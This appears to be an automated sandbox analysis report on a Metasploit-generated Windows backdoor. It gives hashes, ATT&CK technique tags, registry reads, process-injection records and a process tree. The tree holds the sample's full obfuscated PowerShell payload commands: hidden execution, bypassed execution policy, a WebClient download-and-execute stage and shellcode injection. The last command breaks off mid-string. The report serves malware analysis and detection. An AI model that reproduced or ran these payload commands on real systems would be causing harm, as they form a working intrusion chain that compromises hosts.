metasploit | 84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4

General

Target

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Size

421KB
MD5

131270fa068900e6e40c53dd02c528bd
SHA1

f6cbd3bee1ca34059160dfde399a9c1a484f3a98
SHA256

84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4
SHA512

5bd8184316b92757e498f8b2ec49066e1bbbc877d8d87ee6eed214f7f8a68af3b729cb0b3d86db5652c0861352ab7f8be8c944cc722555061803a10934e09e9c
SSDEEP

6144:Pgxu6xcGEWuNas5t38dX6p4098E4FU7kprPcnFOHuln+Otc+EkzI8jSejCE8aKPy:Pgg6xox5nD3FhuE/RdoM/LOuucLRr

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1316	pOWErSheLl.exe
776	powershell.exe
2196	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSheLl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1316	pOWErSheLl.exe
776	powershell.exe
2196	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1316	pOWErSheLl.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 1316	2400	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	28
PID 2400 wrote to memory of 1316	2400	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	28
PID 2400 wrote to memory of 1316	2400	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	28
PID 2400 wrote to memory of 1316	2400	84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe	28
PID 1316 wrote to memory of 776	1316	pOWErSheLl.exe	30
PID 1316 wrote to memory of 776	1316	pOWErSheLl.exe	30
PID 1316 wrote to memory of 776	1316	pOWErSheLl.exe	30
PID 1316 wrote to memory of 776	1316	pOWErSheLl.exe	30
PID 776 wrote to memory of 2196	776	powershell.exe	31
PID 776 wrote to memory of 2196	776	powershell.exe	31
PID 776 wrote to memory of 2196	776	powershell.exe	31
PID 776 wrote to memory of 2196	776	powershell.exe	31
PID 2196 wrote to memory of 2148	2196	powershell.exe	32
PID 2196 wrote to memory of 2148	2196	powershell.exe	32
PID 2196 wrote to memory of 2148	2196	powershell.exe	32
PID 2196 wrote to memory of 2148	2196	powershell.exe	32
PID 2148 wrote to memory of 2592	2148	csc.exe	33
PID 2148 wrote to memory of 2592	2148	csc.exe	33
PID 2148 wrote to memory of 2592	2148	csc.exe	33
PID 2148 wrote to memory of 2592	2148	csc.exe	33

C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe
"C:\Users\Admin\AppData\Local\Temp\84936c9c109156fe6d21ca1a4a2364941b6bbddc3a007cbcac7d77a4730afaf4.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pOWErSheLl.exe
  pOWErSheLl -Wi hIDdEn -CoMMAN "(-jOin(('262828273720302033203420392035203220382035203120362030272d7265706c414345275c772b272c277b247b307d7d272d5245704c4163452720272c2727292d662765272c2762272c2772272c2774272c272d272c2761272c276c272c2773272c2769272c27762729206f623735534c53334c3758442033343b262828273820342036203720322031203920332031203520302034272d5245506c614365275c772b272c277b247b307d7d272d5265506c4143452720272c2727292d66276c272c2761272c2776272c2769272c2765272c2762272c2774272c272d272c2773272c27722729205939364171686e4b507573502031343b2e282e28277b317d7b307d272d6627436d272c2767272928277365542d5641272b27724961626c45272929205a704955564d7a396d6a6c6b2032343b2e2828273520312037203020382036203920322036203420332031272d5245706c414365275c772b272c277b247b307d7d272d7265706c6143652720272c2727292d66272d272c2765272c2769272c276c272c2762272c2773272c2761272c2774272c2776272c27722729206f6a74414777457841314d78282828282e28274745542d56417249272b274142272b276c452729206f623735534c53334c375844292e282776614c75272b276527292b3131292d41535b636861725d292e2827546f735472272b27696e4727292e496e766f6b6528292b2828282e28277b317d7b307d7b327d272d66276941272c276745742d566172272c27624c652729205939364171686e4b50757350292e282776614c272b2775272b274527292b3837292d41535b436861525d292e28277b337d7b317d7b327d7b347d7b307d272d662747272c2754272c275269272c27546f53272c274e27292e696e764f4b4528292b2828282e2828273820322033203620352039203420372039203020312032272d5245704c416365275c772b272c277b247b307d7d272d7245704c6143452720272c2727292d662762272c276c272c2765272c2774272c2772272c2776272c272d272c2769272c2767272c27612729205a704955564d7a396d6a6c6b292e282827332034203020322031272d7265506c416345275c772b272c277b247b307d7d272d7265706c6163652720272c2727292d66276c272c2765272c2775272c2776272c276127292b3735292d41535b434861725d292e28277b317d7b307d272d6627537452494e67272c27544f27292e696e564f4b452829293b706f7765727368656c6c202d4e4f6e694e544552614374202d6e6f4c4f474f202d4e4f70724f66202d77696e446f772068494464454e202d65584563755469204279506173732028262828273520342031203920382030203220362030203320372034272d7245504c614345275c772b272c277b247b307d7d272d5245506c4143452720272c2727292d662761272c2774272c2772272c2762272c2765272c2767272c2769272c276c272c2776272c272d2729206f6a74414777457841314d78292e282827302033203120322034272d7245504c416345275c772b272c277b247b307d7d272d5265704c4163652720272c2727292d662776272c276c272c2775272c2761272c276527292e2827744f5354272b2772272b27694e4727292e496e766f4b6528294a67416f414334414b41416e414563414a774172414363415177416e414373414a77424e414363414b51416f414363416577417741483041657741794148304165774178414830414a774174414759414a77427a414363414c41416e414755414a774173414363415a51425541433041646742684146494161514268414549416241416e41436b414b514167414559415151426e41466b416141417741476b414d4142444144634157674261414341414f514137414359414b41416e41484d415251425541433041566742684148494161514268414363414b77416e414549414a774172414363415441426c414363414b5141674146494161514178414645416341424b414777415a5142684148494164414243414341414d774179414473414c67416f414363416377426c414851414a774172414363414c514232414545414a7741724143634155674270414545415167416e414373414a77424d414363414b77416e414555414a7741704143414153774249414545416377424f4145494161514246414763415451424b41456f4149414133414473414a67416f4143634155774246414651414c51416e414373414a774257414545416367416e414373414a77424a414745415967424d414363414b77416e414755414a774170414341415251426141444d41625142364145304154514255414549415a67423341474d414b41416f414367414b41416d414367414a77423741444541665142374144414166514237414449416651416e414330415a67416e414851414c514232414363414c41416e414763415251416e414377414a77424241484941535142424147494154414246414363414b514167414559415151426e41466b416141417741476b414d414244414463415767426141436b414c67416f414367414a774179414341414d7741674144414149414130414341414d51416e4143304163674246414641415441426841474d415a51416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941475541554142734145454159774246414363414941416e414377414a77416e41436b414c51426d414363416241416e414377414a77426c414363414c41416e414859414a774173414363415951416e414377414a774231414363414b51417241444d414e674170414330415151427a4146734151774249414545415567426441436b414c67416f414367414a77417a414341414d414167414451414941417a414341414e6741674144494149414131414341414d51416e414330416367426c414641416241424241474d415251416e4146774164774172414363414c41416e414873414a4142374144414166514239414363414c51427941455541634142734147454151774246414363414941416e414377414a77416e41436b414c51426d414363416277416e414377414a77426e414363414c41416e41476b414a774173414363416441416e414377414a77427a414363414c41416e414734414a774173414363416367416e41436b414c6742704145344156674276414573415251416f41436b414b77416f414367414b41416d414367414a7742484145554156414174414659415151427941476b414a7741724143634159514269414577415a51416e41436b414941425341476b414d514252414841415367427341475541595142794148514151674170414334414b41416e414873414d514239414873414d414239414363414c51426d414363415a51416e414377414a7742324147454154414231414363414b514172414459414f51417041433041595142544146734151774249414745416367426441436b414c67416f414363416577417741483041657741784148304165774179414830416577417a414830414a774174414759414a774230414538414a774173414363416377416e414377414a774230414849416151424f414363414c41416e414563414a774170414334415351424f414659415477424c414555414b414170414373414b41416f414367414a67416f414359414b41416f414363414d6741674144454149414177414363414c514279414555416341424d41474541517742464143634158414233414373414a774173414363416577416b414873414d414239414830414a774174414849415a514277414777415951426a414755414a774167414363414c41416e414363414b514174414759414a774274414363414c41416e41474d414a774173414363415a77416e41436b414b41416e414563415a5142554143304164674242414363414b77416e4146494153514268414549414a774172414363416241416e414373414a77426c414363414b5141704143414153774249414545416377424f4145494161514246414763415451424b41456f414b514175414367414a7742324147454162414231414555414a774170414373414f51417941436b414c51426841464d415777426a4147674159514279414630414b514175414367414a774230414538414a7741724143634155774255414849414a774172414363415351416e414373414a774275414563414a774170414334415351424f4148594162774272414755414b41417041436b414f774251414738416477426c414849416377426f414555416241424d414341414c5142754145384154674270414534415641426c414341414c51424f414738415441427641456341627741674143304162674276414841415567427641455941535141674143304156774167414767416151426b414551415251424f414341414c514246414667415a51426a414655415641416741454941575142774147454155774254414341414b414175414367414a77423741444141665142374144454166514237414449416651416e414330415a67416e41476341525142554143304156674242414649416151416e414377414a774268414749416241416e414377414a77426c414363414b514167414555415767417a414730416567424e4145304156414243414759416477426a41436b414c67416f414363416577417941483041657741774148304165774178414830414a774174414759414a774268414777414a774173414363415651426c414363414c41416e414859414a774170414334414b41416e414873414d514239414873414d674239414873414d414239414363414c51426d414363416267426e414363414c41416e4146514154774254414851414a7741734143634155674270414363414b51417541476b41546742324147384161774246414367414b51416f41467341597742494145454155674262414630415851416f414367415777426a41476741515142794146734158514264414367414c67416f414363416577417841483041657741794148304165774177414830416577417a414830414a774174414759414a774244414363414c41416e4147344152514233414330415477426941476f414a774173414363415a51416e414377414a774255414363414b514167414367414a77424f4147554156414175414863414a774172414363415a51424341474d41624142704147554162674255414363414b514170414334414b41416e41475141547742334145344162414250414363414b77416e414745415a4142544148514163674270414363414b77416e414734414a774172414363415a77416e41436b414c67424a4147344164674250414773415a51416f414351415a514275414859414f6742304147554162514277414373414a7742634148594165514235414849415441425241465541655142524146494154674249414363414b514170414877414a514237414351415a67424f41476b416341424c414573415977427641446341515142774145304150514177414830416577416b414638414c51426941486741547742534143634151774134414751415441426c4148514155774234414667415a51424a414859414e674274414751414f51426b414551415567425a414649416451426d4147634163674245414551414a774262414351415a67424f41476b416341424c41457341597742764144634151514277414530414b774172414355414d6741334146304166514170414330416167427641476b416267416e414363414b514137414649415a514274414738416467426c41433041535142304147554162514167414351415a514275414859414f6742304147554162514277414363415841423241486b4165514279414577415551425641486b4155514253414534415341416e41413d3d'-spLIt'(?<=\G.{2})(?!$)')|%{[CONvERT]::('{0}{2}{1}'-f'T','Nt16','OI').INVoKE(($_),16)-as[cHar]}))|&('{2}{0}{3}{1}'-f'vOKE-e','ioN','in','xPreSS')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOniNTERaCt -noLOGO -NOprOf -winDow hIDdEN -eXEcuTi ByPass -ec JgAoAC4AKAAnAEcAJwArACcAQwAnACsAJwBNACcAKQAoACcAewAwAH0AewAyAH0AewAxAH0AJwAtAGYAJwBzACcALAAnAGUAJwAsACcAZQBUAC0AdgBhAFIAaQBhAEIAbAAnACkAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACAAOQA7ACYAKAAnAHMARQBUAC0AVgBhAHIAaQBhACcAKwAnAEIAJwArACcATABlACcAKQAgAFIAaQAxAFEAcABKAGwAZQBhAHIAdABCACAAMwAyADsALgAoACcAcwBlAHQAJwArACcALQB2AEEAJwArACcAUgBpAEEAQgAnACsAJwBMACcAKwAnAEUAJwApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAIAA3ADsAJgAoACcAUwBFAFQALQAnACsAJwBWAEEAcgAnACsAJwBJAGEAYgBMACcAKwAnAGUAJwApACAARQBaADMAbQB6AE0ATQBUAEIAZgB3AGMAKAAoACgAKAAmACgAJwB7ADEAfQB7ADAAfQB7ADIAfQAnAC0AZgAnAHQALQB2ACcALAAnAGcARQAnACwAJwBBAHIASQBBAGIATABFACcAKQAgAEYAQQBnAFkAaAAwAGkAMABDADcAWgBaACkALgAoACgAJwAyACAAMwAgADAAIAA0ACAAMQAnAC0AcgBFAFAATABhAGMAZQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAGUAUABsAEEAYwBFACcAIAAnACwAJwAnACkALQBmACcAbAAnACwAJwBlACcALAAnAHYAJwAsACcAYQAnACwAJwB1ACcAKQArADMANgApAC0AQQBzAFsAQwBIAEEAUgBdACkALgAoACgAJwAzACAAMAAgADQAIAAzACAANgAgADIAIAA1ACAAMQAnAC0AcgBlAFAAbABBAGMARQAnAFwAdwArACcALAAnAHsAJAB7ADAAfQB9ACcALQByAEUAcABsAGEAQwBFACcAIAAnACwAJwAnACkALQBmACcAbwAnACwAJwBnACcALAAnAGkAJwAsACcAdAAnACwAJwBzACcALAAnAG4AJwAsACcAcgAnACkALgBpAE4AVgBvAEsARQAoACkAKwAoACgAKAAmACgAJwBHAEUAVAAtAFYAQQByAGkAJwArACcAYQBiAEwAZQAnACkAIABSAGkAMQBRAHAASgBsAGUAYQByAHQAQgApAC4AKAAnAHsAMQB9AHsAMAB9ACcALQBmACcAZQAnACwAJwB2AGEATAB1ACcAKQArADYAOQApAC0AYQBTAFsAQwBIAGEAcgBdACkALgAoACcAewAwAH0AewAxAH0AewAyAH0AewAzAH0AJwAtAGYAJwB0AE8AJwAsACcAcwAnACwAJwB0AHIAaQBOACcALAAnAEcAJwApAC4ASQBOAFYATwBLAEUAKAApACsAKAAoACgAJgAoACYAKAAoACcAMgAgADEAIAAwACcALQByAEUAcABMAGEAQwBFACcAXAB3ACsAJwAsACcAewAkAHsAMAB9AH0AJwAtAHIAZQBwAGwAYQBjAGUAJwAgACcALAAnACcAKQAtAGYAJwBtACcALAAnAGMAJwAsACcAZwAnACkAKAAnAEcAZQBUAC0AdgBBACcAKwAnAFIASQBhAEIAJwArACcAbAAnACsAJwBlACcAKQApACAASwBIAEEAcwBOAEIAaQBFAGcATQBKAEoAKQAuACgAJwB2AGEAbAB1AEUAJwApACsAOQAyACkALQBhAFMAWwBjAGgAYQByAF0AKQAuACgAJwB0AE8AJwArACcAUwBUAHIAJwArACcASQAnACsAJwBuAEcAJwApAC4ASQBOAHYAbwBrAGUAKAApACkAOwBQAG8AdwBlAHIAcwBoAEUAbABMACAALQBuAE8ATgBpAE4AVABlACAALQBOAG8ATABvAEcAbwAgAC0AbgBvAHAAUgBvAEYASQAgAC0AVwAgAGgAaQBkAEQARQBOACAALQBFAFgAZQBjAFUAVAAgAEIAWQBwAGEAUwBTACAAKAAuACgAJwB7ADAAfQB7ADEAfQB7ADIAfQAnAC0AZgAnAGcARQBUAC0AVgBBAFIAaQAnACwAJwBhAGIAbAAnACwAJwBlACcAKQAgAEUAWgAzAG0AegBNAE0AVABCAGYAdwBjACkALgAoACcAewAyAH0AewAwAH0AewAxAH0AJwAtAGYAJwBhAGwAJwAsACcAVQBlACcALAAnAHYAJwApAC4AKAAnAHsAMQB9AHsAMgB9AHsAMAB9ACcALQBmACcAbgBnACcALAAnAFQATwBTAHQAJwAsACcAUgBpACcAKQAuAGkATgB2AG8AawBFACgAKQAoAFsAYwBIAEEAUgBbAF0AXQAoACgAWwBjAGgAQQByAFsAXQBdACgALgAoACcAewAxAH0AewAyAH0AewAwAH0AewAzAH0AJwAtAGYAJwBDACcALAAnAG4ARQB3AC0ATwBiAGoAJwAsACcAZQAnACwAJwBUACcAKQAgACgAJwBOAGUAVAAuAHcAJwArACcAZQBCAGMAbABpAGUAbgBUACcAKQApAC4AKAAnAGQATwB3AE4AbABPACcAKwAnAGEAZABTAHQAcgBpACcAKwAnAG4AJwArACcAZwAnACkALgBJAG4AdgBPAGsAZQAoACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAHYAeQB5AHIATABRAFUAeQBRAFIATgBIACcAKQApAHwAJQB7ACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0APQAwAH0AewAkAF8ALQBiAHgATwBSACcAQwA4AGQATABlAHQAUwB4AFgAZQBJAHYANgBtAGQAOQBkAEQAUgBZAFIAdQBmAGcAcgBEAEQAJwBbACQAZgBOAGkAcABLAEsAYwBvADcAQQBwAE0AKwArACUAMgA3AF0AfQApAC0AagBvAGkAbgAnACcAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAZQBuAHYAOgB0AGUAbQBwACcAXAB2AHkAeQByAEwAUQBVAHkAUQBSAE4ASAAnAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nONiNTe -NoLoGo -nopRoFI -W hidDEN -EXecUT BYpaSS -ec KAAtAGoAbwBJAG4AKAAoACcAMgA0ADUANwA2AGEANQA2ADUAMAA0AGEANgAzADUAMgA3ADAAMwA2ADQAZgA2ADUAMwAwADMAZAAyADYAMgA4ADIANgAyADgAMgA3ADcAYgAzADAANwBkADIANwAyAGQANgA2ADIANwA0ADcANgAzADYAZAAyADcAMgA5ADIAOAAyADgAMgA3ADMAMwAyADAAMwAwADIAMAAzADAAMgAwADMANAAyADAAMwAxADIAMAAzADUAMgAwADMANgAyADAAMwAyADIANwAyAGQANQAyADQANQA1ADAANgBjADQAMQA0ADMANAA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADUAMgA2ADUANwAwADQAYwA2ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANgA0ADIANwAyAGMAMgA3ADcANAAyADcAMgBjADIANwA2ADUAMgA3ADIAYwAyADcANgAxADIANwAyAGMAMgA3ADIAZAAyADcAMgBjADIANwA3ADkAMgA3ADIAYwAyADcANwAwADIANwAyADkAMgA5ADIAMAAyAGQANgBkADIAMAAyADcANQBiADQANAA2AGMANgBjADQAOQA2AGQANwAwADYAZgA3ADIANwA0ADIAOAAyADIANgBiADYANQA3ADIANgBlADYANQA2AGMAMwAzADMAMgAyAGUANgA0ADYAYwA2AGMAMgAyADIAOQA1AGQAMgAwADcAMAA3ADUANgAyADYAYwA2ADkANgAzADIAMAA3ADMANwA0ADYAMQA3ADQANgA5ADYAMwAyADAANgA1ADcAOAA3ADQANgA1ADcAMgA2AGUAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA1ADYANgA5ADcAMgA3ADQANwA1ADYAMQA2AGMANAAxADYAYwA2AGMANgBmADYAMwAyADgANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADQANwA3ADUAMwA2ADkANwBhADYANQAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA2ADYAYwA0ADEANgBjADYAYwA2AGYANgAzADYAMQA3ADQANgA5ADYAZgA2AGUANQA0ADcAOQA3ADAANgA1ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADYANgBjADUAMAA3ADIANgBmADcANAA2ADUANgAzADcANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAYgA2ADUANwAyADYAZQA2ADUANgBjADMAMwAzADIAMgBlADYANAA2AGMANgBjADIAMgAyADkANQBkADIAMAA3ADAANwA1ADYAMgA2AGMANgA5ADYAMwAyADAANwAzADcANAA2ADEANwA0ADYAOQA2ADMAMgAwADYANQA3ADgANwA0ADYANQA3ADIANgBlADIAMAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANAAzADcAMgA2ADUANgAxADcANAA2ADUANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQAMgA4ADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUANAA2ADgANwAyADYANQA2ADEANgA0ADQAMQA3ADQANwA0ADcAMgA2ADkANgAyADcANQA3ADQANgA1ADcAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA0ADcANwA1ADMANwA0ADYAMQA2ADMANgBiADUAMwA2ADkANwBhADYANQAyAGMAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUAMwA3ADQANgAxADcAMgA3ADQANAAxADYANAA2ADQANwAyADYANQA3ADMANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQAwADYAMQA3ADIANgAxADYAZAA2ADUANwA0ADYANQA3ADIAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYANAA3ADcANAAzADcAMgA2ADUANgAxADcANAA2ADkANgBmADYAZQA0ADYANgBjADYAMQA2ADcANwAzADIAYwAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAYwA3ADAANQA0ADYAOAA3ADIANgA1ADYAMQA2ADQANAA5ADYANAAyADkAMwBiADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAZAA3ADMANwA2ADYAMwA3ADIANwA0ADIAZQA2ADQANgBjADYAYwAyADIAMgA5ADUAZAAyADAANwAwADcANQA2ADIANgBjADYAOQA2ADMAMgAwADcAMwA3ADQANgAxADcANAA2ADkANgAzADIAMAA2ADUANwA4ADcANAA2ADUANwAyADYAZQAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYAZAA2ADUANgBkADcAMwA2ADUANwA0ADIAOAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANgA0ADYANQA3ADMANwA0ADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA3ADMANwAyADYAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgAzADYAZgA3ADUANgBlADcANAAyADkAMwBiADIANwAyADAAMgBkADYAZQA2ADEANgBkADYANQAyADAAMgA3ADUANwA2ADkANgBlADMAMwAzADIAMgA3ADIAMAAyAGQANgBlADcAMwAyADAANQA3ADYAOQA2AGUAMwAzADMAMgA0ADYANwA1ADYAZQA2ADMANwA0ADYAOQA2AGYANgBlADcAMwAyADAAMgBkADcAMAA2ADEANwAzADMAYgA1AGIANgAyADUAOQA1ADQANgA1ADUAYgA1AGQANQBkADIANAA2ADUANwA3ADcAMAA2AGMANgA0ADQAMwAzADAANgAyADUAOQA2ADkANwAwADMAMwAzAGQAMwAwADcAOAA2ADYANgAzADIAYwAzADAANwA4ADYANQAzADgAMgBjADMAMAA3ADgAMwA4ADMAMgAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADYAMwAwADIAYwAzADAANwA4ADMAOAAzADkAMgBjADMAMAA3ADgANgA1ADMANQAyAGMAMwAwADcAOAAzADMAMwAxADIAYwAzADAANwA4ADYAMwAzADAAMgBjADMAMAA3ADgAMwA2ADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADAAMgBjADMAMAA3ADgAMwAzADMAMAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAwADYAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAxADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANwAzADIAMgBjADMAMAA3ADgAMwAyADMAOAAyAGMAMwAwADcAOAAzADAANgA2ADIAYwAzADAANwA4ADYAMgAzADcAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADIAMwA2ADIAYwAzADAANwA4ADMAMwAzADEAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADEANgAzADIAYwAzADAANwA4ADMAMwA2ADMAMgBjADMAMAA3ADgAMwA2ADMAMQAyAGMAMwAwADcAOAAzADcANgAzADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgAMwAyADYAMwAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADYAMwAzADEAMgBjADMAMAA3ADgANgAzADYANgAyAGMAMwAwADcAOAAzADAANgA0ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgAzADMANwAyAGMAMwAwADcAOAA2ADUAMwAyADIAYwAzADAANwA4ADYANgAzADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADUAMwA3ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAMgAyAGMAMwAwADcAOAAzADEAMwAwADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMQAyAGMAMwAwADcAOAAzADMANgAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA0ADYAMwAyAGMAMwAwADcAOAAzADEAMwAxADIAYwAzADAANwA4ADMANwAzADgAMgBjADMAMAA3ADgANgA1ADMAMwAyAGMAMwAwADcAOAAzADQAMwA4ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMQAyAGMAMwAwADcAOAAzADUAMwAxADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAOQAyAGMAMwAwADcAOAAzADIAMwAwADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANAAzADkAMgBjADMAMAA3ADgAMwAxADMAOAAyAGMAMwAwADcAOAA2ADUAMwAzADIAYwAzADAANwA4ADMAMwA2ADEAMgBjADMAMAA3ADgAMwA0ADMAOQAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMwAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADYAMgBjADMAMAA3ADgAMwAzADMAMQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYAMQA2ADMAMgBjADMAMAA3ADgANgAzADMAMQAyAGMAMwAwADcAOAA2ADMANgA2ADIAYwAzADAANwA4ADMAMAA2ADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADMAMwA3ADIAYwAzADAANwA4ADMAMwAzADgAMgBjADMAMAA3ADgANgA1ADMAMAAyAGMAMwAwADcAOAAzADcAMwA1ADIAYwAzADAANwA4ADYANgAzADYAMgBjADMAMAA3ADgAMwAwADMAMwAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADYANgAzADgAMgBjADMAMAA3ADgAMwAzADYAMgAyAGMAMwAwADcAOAAzADcANgA0ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwA3ADMANQAyAGMAMwAwADcAOAA2ADUAMwA0ADIAYwAzADAANwA4ADMANQAzADgAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMANgAzADYAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAANgAzADIAYwAzADAANwA4ADMANAA2ADIAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAMQA2ADMAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwAzADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAwADMANAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMAAyAGMAMwAwADcAOAAzADgAMwA5ADIAYwAzADAANwA4ADMANAAzADQAMgBjADMAMAA3ADgAMwAyADMANAAyAGMAMwAwADc